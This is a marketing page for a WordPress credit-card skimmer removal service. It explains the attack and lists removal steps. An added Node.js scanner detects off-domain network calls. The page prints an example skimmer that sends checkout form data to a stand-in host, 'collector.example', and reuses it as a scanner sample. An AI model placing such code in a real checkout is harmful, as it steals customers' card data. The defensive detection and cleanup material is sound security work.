// CARD SKIMMER · WORDPRESS · REMOVED
WordPress credit card skimmer removal.
Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.
§ 01 — MECHANISM
A few lines of JavaScript can steal every order.
A card skimmer is a tiny piece of JavaScript that listens to your checkout form. Every time a customer types their card number, the skimmer makes a copy and sends it to an address the attacker controls — usually a server that looks innocent from the outside.
The page still works. The order still goes through. Nothing looks wrong to the customer or to you. I reproduce the order in a sandbox, trace the script back to where it lives in your site, and remove it without breaking the rest of the checkout.
document.querySelector('form.checkout').addEventListener('submit', function (e) {
  const data = new FormData(e.target);
  fetch('https://collector.example/c', {
    method: 'POST', body: data, mode: 'no-cors'
  });
});

// A fetch to an external host on form submit is the signature.
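An added example, not part of the original page or the author's tooling: a small Node.js scan that looks for that signature in script text pulled from theme files, plugin assets, or database rows, and reports network calls whose literal URL points off the shop's domain. The names `SINKS`, `FORM_HINT`, `findOffDomainSinks`, the host `shop.example`, and both sample strings are assumptions constructed for illustration.

```javascript
// Network sinks a script can use to send data out; each captures a literal URL.
const SINKS = [
  { name: 'fetch', re: /\bfetch\s*\(\s*(?<q>['"`])(?<url>.*?)\k<q>/g },
  { name: 'sendBeacon', re: /\bsendBeacon\s*\(\s*(?<q>['"`])(?<url>.*?)\k<q>/g },
  { name: 'xhr.open', re: /\.open\s*\(\s*(['"`])[A-Za-z]+\1\s*,\s*(?<q>['"`])(?<url>.*?)\k<q>/g },
  { name: 'img.src', re: /\.src\s*=\s*(?<q>['"`])(?<url>.*?)\k<q>/g },
];
// Signs that the same script also reads form or keystroke data.
const FORM_HINT = /new\s+FormData|addEventListener\s*\(\s*['"](?:submit|change|input|keyup|blur)['"]/;

function findOffDomainSinks(source, siteHost, allowHosts = []) {
  const trusted = (h) =>
    h === siteHost || h.endsWith('.' + siteHost) || allowHosts.includes(h);
  const formContext = FORM_HINT.test(source);
  const findings = [];
  for (const { name, re } of SINKS) {
    for (const m of source.matchAll(re)) {
      let host;
      // Relative and protocol-relative URLs resolve against the shop's origin.
      try { host = new URL(m.groups.url, `https://${siteHost}/`).hostname; }
      catch { continue; }
      if (trusted(host)) continue;
      const line = source.slice(0, m.index).split('\n').length;
      findings.push({ sink: name, host, line, severity: formContext ? 'high' : 'review' });
    }
  }
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed sample: the skimmer pattern shown above.
const SAMPLE_SKIMMER = `
document.querySelector('form.checkout').addEventListener('submit', function (e) {
  const data = new FormData(e.target);
  fetch('https://collector.example/c', { method: 'POST', body: data, mode: 'no-cors' });
});`;

// Constructed sample: same-site calls only (paths and hosts are made up).
const SAMPLE_CLEAN = `
fetch('/checkout/update');
navigator.sendBeacon('https://stats.shop.example/hit', 'pv');`;

console.log(findOffDomainSinks(SAMPLE_SKIMMER, 'shop.example'));
console.log(findOffDomainSinks(SAMPLE_CLEAN, 'shop.example'));
```

A static match only catches literal URLs; the sandboxed test order described under TRIAGE remains the check for destinations assembled at runtime. Pass the payment processor's script hosts in `allowHosts` so legitimate checkout traffic is not flagged.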
§ 02 — WHAT WE REMOVE
Every place a skimmer can hide.
- [ TRIAGE ] I place a test order in a sandbox and watch every network call the checkout makes.
- [ JAVASCRIPT ] Theme files, plugin assets, and inline scripts reviewed. Anything sending form data off-domain — pulled.
- [ DATABASE ] Injected scripts in wp_options, wp_posts, and active widgets — purged. Persistence removed.
- [ SERVER ] PHP backdoors that re-install the skimmer hunted down. Cron jobs and must-use plugins checked.
- [ TIMELINE ] First-seen and last-seen dates established so you know which orders were exposed.
- [ REPORT ] Plain-English forensic write-up suitable for acquirers and insurers. Entry vector named.
§ PRICE
Flat $279. One-time. Per site.
[ RESCUE ]
$279
FLAT · ONE-TIME · PER SITE
Manual cleanup, entry-vector identification, written forensic report.
Start a cleanup →
[ SHIELD ]
$29 / mo
PER SITE · CANCEL ANY TIME
Continuous monitoring, hardening, one cleanup per year included.
Get protected →
Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
See all services →
Start an engagement.
Send the scope, stack, and timeline. You get a written proposal with a fixed quote.